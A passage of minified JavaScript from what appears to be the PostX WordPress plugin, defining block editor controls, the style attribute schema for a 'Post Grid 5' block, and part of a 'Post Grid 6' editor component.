Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category",pro:!0},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"],exSettings:["catPosition"],incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imgMargin","imgWidth","imageScale","imgHeight"],exStyle:["imgMargin","imgWidth","imageScale","imgHeight"],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},68158:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},overlayHeight:{type:"object",default:{lg:"500",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout3 .ultp-block-content-overlay,\n          {{ULTP}} .ultp-layout1 .ultp-block-content-overlay,\n          {{ULTP}} .ultp-layout2 .ultp-block-content-overlay,\n          {{ULTP}} .ultp-layout2 .ultp-block-item:nth-child(2) .ultp-block-content-overlay, \n          {{ULTP}} .ultp-layout1 .ultp-block-item:nth-child(2) .ultp-block-content-overlay { height: calc({{overlayHeight}}/2); } \n          {{ULTP}} .ultp-layout1 .ultp-block-item:first-child,\n          {{ULTP}} .ultp-layout2 .ultp-block-item:first-child { max-height: {{overlayHeight}}; } \n          {{ULTP}} .ultp-block-row { max-height: {{overlayHeight}}; }\n          {{ULTP}} .ultp-block-item .ultp-block-image img,\n          {{ULTP}} .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; } \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-image img,\n          {{ULTP}} .ultp-block-item:first-child .ultp-block-empty-image { width: 100%; object-fit: cover; height: 100%; }\n\t\t  {{ULTP}} .ultp-block-items-wrap { --item-height: {{overlayHeight}}; }\n          @media (max-width: 768px) { \n            {{ULTP}} .ultp-block-item .ultp-block-content-overlay .ultp-block-image img,\n            {{ULTP}} ultp-block-content-overlay .ultp-block-empty-image { height: calc( {{overlayHeight}}/2 ); min-height: inherit; }\n          }"}]},columnGridGap:{type:"object",default:{lg:"5",unit:"px"},style:[{selector:"{{ULTP}} .ultp-layout1 .ultp-block-item:first-child .ultp-block-content-overlay,\n          \t\t{{ULTP}} .ultp-layout2 .ultp-block-item:first-child .ultp-block-content-overlay { height: calc(100% + {{columnGridGap}}); }\n\t\t\t\t{{ULTP}} .ultp-layout1 .ultp-block-item:not(:first-child) .ultp-block-content-overlay,\n\t\t\t\t{{ULTP}} .ultp-layout2 .ultp-block-item:not(:first-child) .ultp-block-content-overlay { height: calc(var(--item-height) / 2 - {{columnGridGap}}); }\n          \t\t{{ULTP}} .ultp-block-row { grid-row-gap: {{columnGridGap}}; }\n          \t\t{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},queryNumber:{type:"string",default:"4",style:[{depends:[{key:"queryType",condition:"!=",value:["customPosts","posts","archiveBuilder"]},{key:"querySticky",condition:"!=",value:!0}]}]},titleShow:{type:"boolean",default:!0},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a { color:{{titleColor}} !important;}"}]},titleHoverColor:{type:"string",default:"rgba(255,255,255,0.70)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleLgTypo:{type:"object",default:{openTypography:1,size:{lg:"28",unit:"px"},height:{lg:"32",unit:"px"},decoration:"none",family:"",weight:"700"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:first-child .ultp-block-title, \n          {{ULTP}} .ultp-block-item:first-child .ultp-block-title a, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(4) .ultp-block-title, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:nth-child(4) .ultp-block-title a"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"20",unit:"px"},height:{lg:"26",unit:"px"},decoration:"none",family:"",weight:"600"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap:not(.ultp-layout3) .ultp-block-item:not(:first-child) .ultp-block-title, \n          {{ULTP}} .ultp-block-items-wrap:not(.ultp-layout3) .ultp-block-item:not(:first-child) .ultp-block-title a, \n          {{ULTP}} .ultp-layout3 .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title, \n          {{ULTP}} .ultp-block-item:not(:first-child):not(:nth-child(4)) .ultp-block-title a "}]},titlePadding:{type:"object",default:{lg:{top:10,bottom:5,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a{ background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style9"}],selector:"{{ULTP}} .ultp-title-style9 a { background-image: linear-gradient(120deg,{{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 10px; background-position: 0 88%; transition: 0.3s ease-in; padding: 3px 5px; } "}]},titleAnimation:{type:"string",default:""},showImage:{type:"boolean",default:!0},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape",depends:[{key:"showImage",condition:"==",value:!0}]},imgCropSmall:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_square",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"gridStyle",condition:"!=",value:"style1"}]}]},imgAnimation:{type:"string",default:"zoomIn"},imgGrayScale:{type:"object",default:{lg:"0",ulg:"%",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-image img { filter: grayscale({{imgGrayScale}}); }"}]},imgHoverGrayScale:{type:"object",default:{lg:"0",unit:"%"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-image img { filter: grayscale({{imgHoverGrayScale}}); }"}]},imgRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap, \n          {{ULTP}} .ultp-block-image { border-radius:{{imgRadius}}; }"}]},imgHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-wrap:hover, \n          {{ULTP}} .ultp-block-content-wrap:hover .ultp-block-image { border-radius:{{imgHoverRadius}}; }"}]},imgShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-content-overlay"}]},imgHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"showImage",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item:hover .ultp-block-content-overlay"}]},imgOverlay:{type:"boolean",default:!0},imgOverlayType:{type:"string",default:"simgleGradient",style:[{depends:[{key:"imgOverlay",condition:"==",value:!0}]}]},overlayColor:{type:"object",default:{openColor:1,type:"color",color:"#0e1523"},style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before"}]},imgOpacity:{type:"string",default:.7,style:[{depends:[{key:"imgOverlayType",condition:"==",value:"custom"}],selector:"{{ULTP}} .ultp-block-image-custom > a::before { opacity: {{imgOpacity}}; }"}]},fallbackEnable:{type:"boolean",default:!0,style:[{depends:[{key:"showImage",condition:"==",value:!0}]}]},fallbackImg:{type:"object",default:"",style:[{depends:[{key:"showImage",condition:"==",value:!0},{key:"fallbackEnable",condition:"==",value:!0}]}]},imgSrcset:{type:"boolean",default:!1},imgLazy:{type:"boolean",default:!1},showSmallMeta:{type:"boolean",default:!0},metaListSmall:{type:"string",default:'["metaDate"]'},showSmallCat:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!1},showSeoMeta:{type:"boolean",default:!1},showSmallExcerpt:{type:"boolean",default:!1},showFullExcerpt:{type:"boolean",default:!1,style:[{depends:[{key:"showSeoMeta",condition:"==",value:!1}]}]},excerptLimit:{type:"string",default:20,style:[{depends:[{key:"showFullExcerpt",condition:"==",value:!1}]}]},excerptColor:{type:"string",default:"#fff",style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, \n        {{ULTP}} .ultp-block-excerpt p { color:{{excerptColor}}; }"}]},excerptTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:20,unit:"px"},decoration:"none",family:""},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt, {{ULTP}} .ultp-block-excerpt p"}]},excerptPadding:{type:"object",default:{lg:{top:15,bottom:"",unit:"px"}},style:[{depends:[{key:"excerptShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-excerpt { padding: {{excerptPadding}}; }"}]},showSmallBtn:{type:"boolean",default:!1},contentAlign:{type:"string",default:"left",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-start;}"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: center;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content { text-align:{{contentAlign}}; } \n          {{ULTP}} .ultp-block-meta {justify-content: flex-end;} \n          .rtl {{ULTP}} .ultp-block-meta {justify-content: start;}"},{depends:[{key:"contentAlign",condition:"==",value:"right"},{key:"readMore",condition:"==",value:!0}],selector:".rtl {{ULTP}} .ultp-block-readmore a {display:flex; flex-direction:row-reverse;justify-content: flex-end;}"}]},overlayContentPosition:{type:"string",default:"bottomPosition",style:[{depends:[{key:"overlayContentPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"overlayContentPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},overlayBgColor:{type:"object",default:{openColor:1,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},overlayWrapPadding:{type:"object",default:{lg:{top:"20",bottom:"20",left:"20",right:"20",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{overlayWrapPadding}}; }"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},columnFlip:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},headingShow:{type:"boolean",default:!0},headingText:{type:"string",default:"Post Grid #5"},filterBelowTitle:{type:"boolean",default:!1,style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { position: relative; display: block; margin: auto 0 0 0; height: auto; }"}]},filterAlign:{type:"object",default:{lg:""},style:[{depends:[{key:"filterBelowTitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation { text-align:{{filterAlign}}; }"}]},filterType:{type:"string",default:"category"},filterText:{type:"string",default:"all"},filterValue:{type:"string",default:"[]",style:[{depends:[{key:"filterType",condition:"!=",value:""}]}]},fliterTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:22,unit:"px"},decoration:"none",family:"",weight:500},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a"}]},filterColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a { color:{{filterColor}}; }\n          {{ULTP}} .flexMenu-viewMore a:before { border-color:{{filterColor}}}"}]},filterHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a:hover, \n          {{ULTP}} .ultp-filter-navigation .ultp-filter-wrap ul li a.filter-active { color:{{filterHoverColor}} !important; } \n          {{ULTP}} .ultp-flex-menu .flexMenu-viewMore a:hover::before { border-color:{{filterHoverColor}}}"}]},filterBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { background:{{filterBgColor}}; }"}]},filterHoverBgColor:{type:"string",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover, \n          {{ULTP}} .ultp-filter-wrap ul li.filter-item > a.filter-active, \n          {{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore > a:hover { background:{{filterHoverBgColor}}; }"}]},filterBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a"}]},filterHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a:hover"}]},filterRadius:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a { border-radius:{{filterRadius}}; }"}]},fliterSpacing:{type:"object",default:{lg:{top:"",bottom:"",right:"",left:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li { margin:{{fliterSpacing}}; }"}]},fliterPadding:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.filter-item > a, \n          {{ULTP}} .ultp-filter-wrap .flexMenu-viewMore > a { padding:{{fliterPadding}}; }"}]},filterDropdownColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a { color:{{filterDropdownColor}}; }"}]},filterDropdownHoverColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup li a:hover { color:{{filterDropdownHoverColor}}; }"}]},filterDropdownBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { background:{{filterDropdownBg}}; }"}]},filterDropdownRadius:{type:"object",default:{lg:{top:2,right:2,bottom:2,left:2,unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { border-radius:{{filterDropdownRadius}}; }"}]},filterDropdownPadding:{type:"object",default:{lg:{top:"15",bottom:"15",left:"20",right:"20",unit:"px"}},style:[{depends:[{key:"filterShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-filter-wrap ul li.flexMenu-viewMore .flexMenu-popup { padding:{{filterDropdownPadding}}; }"}]},filterMobile:{type:"boolean",default:!0},filterMobileText:{type:"string",default:"More",style:[{depends:[{key:"filterMobile",condition:"==",value:!0}]}]},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},paginationType:{type:"string",default:"navigation"},...(0,o.t)(["advFilter","heading","pagiBlockCompatibility","advanceAttr","video","pagination","meta","category","readMore","query"],["paginationText","loadMoreText","paginationAjax","pagiMargin","queryNumPosts"],[{key:"pagiAlign",default:{lg:"left"}},{key:"metaSeparator",default:"emptyspace"},{key:"metaColor",default:"#F3F3F3"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"metaSpacing",default:{lg:"10",unit:"px"}},{key:"metaList",default:'["metaAuthor","metaDate"]'},{key:"catBgHoverColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"}},{key:"catHoverColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catBgColor",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"}},{key:"catColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"catLineHoverColor",default:"var(--postx_preset_Secondary_color)"},{key:"catLineColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreColor",default:"var(--postx_preset_Over_Primary_color)"},{key:"readMoreBgColor",default:"var(--postx_preset_Primary_color)"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Secondary_color)"}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({defColor:"#fff"})}},31693:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(69234),r=l(68158),s=l(89122);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-grid-5/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-grid-5.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postgrid5.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-grid-5")]},edit:n.Z,save:()=>null})},63230:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(71766);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),{setAttributes:U,name:M,attributes:A,clientId:H,isSelected:N,className:j,context:Z,attributes:{blockId:O,excerptLimit:R,metaStyle:D,metaShow:z,showSmallMeta:F,catShow:W,showImage:V,metaSeparator:G,titleShow:q,catStyle:$,catPosition:K,titlePosition:J,excerptShow:Y,imgAnimation:X,imgOverlayType:Q,imgOverlay:ee,metaList:te,metaListSmall:le,showSmallCat:oe,readMore:ae,readMoreText:ie,readMoreIcon:ne,overlayContentPosition:re,showSmallBtn:se,showSmallExcerpt:pe,metaPosition:ce,showFullExcerpt:ue,layout:de,columnFlip:me,titleAnimation:ge,customCatColor:ye,onlyCatColor:be,contentTag:ve,titleTag:he,showSeoMeta:fe,titleLength:ke,metaMinText:we,metaAuthorPrefix:xe,titleStyle:Te,metaDateFormat:_e,authorLink:Ce,imgCrop:Ee,imgCropSmall:Se,fallbackEnable:Pe,vidIconEnable:Le,notFoundMessage:Ie,dcEnabled:Be,dcFields:Ue,previewImg:Me,advanceId:Ae,paginationShow:He,headingShow:Ne,filterShow:je,paginationType:Ze,navPosition:Oe,querySticky:Re,V4_1_0_CompCheck:{runComp:De},currentPostId:ze}}=e;function Fe(e){B({...l,selectedDC:e})}function We(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ve(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e)}function Ge(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function qe(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(A)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),qe()}),[]),T((()=>{const t=H.substr(0,6),l=L(I(H));(0,a.qi)(U,l,ze,H),(0,y.h)(e),O?O&&O!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||U({blockId:t})):(U({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&U({queryType:"archiveBuilder"}))}),[H]),T((()=>{const e=t.current;(0,b.o6)()&&0===A.dcFields.length&&U({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,A)&&(qe(),t.current=A),e.isSelected!==N&&N&&(0,f.gT)(Ve,Ge)):t.current=A}),[A]),T((()=>{Re&&U({queryNumber:"5"})}),[Re]);const $e={setAttributes:U,name:M,attributes:A,setSection:Ve,section:l.section,clientId:H,context:Z,setSelectedDc:Fe,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){Fe(e),Ge("dc_group")}};let Ke;if(O&&(Ke=(0,m.Kh)(A,"ultimate-post/post-grid-6",O,(0,a.k0)())),Me)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Me});const Je=x({...Ae&&{id:Ae},className:`ultp-block-${O} ${j}`,onClick:e=>{e.stopPropagation(),Ve("general"),Ge("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:$e,selected:l.toolbarSettings}),(0,o.createElement)(g.Z,{include:[{type:"query",exclude:["queryNumber","queryNumPosts"]},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-grid-6",key:"layout",options:[{img:"assets/img/layouts/pg6/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pg6/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0}]},{type:"feat_toggle",label:__("Grid 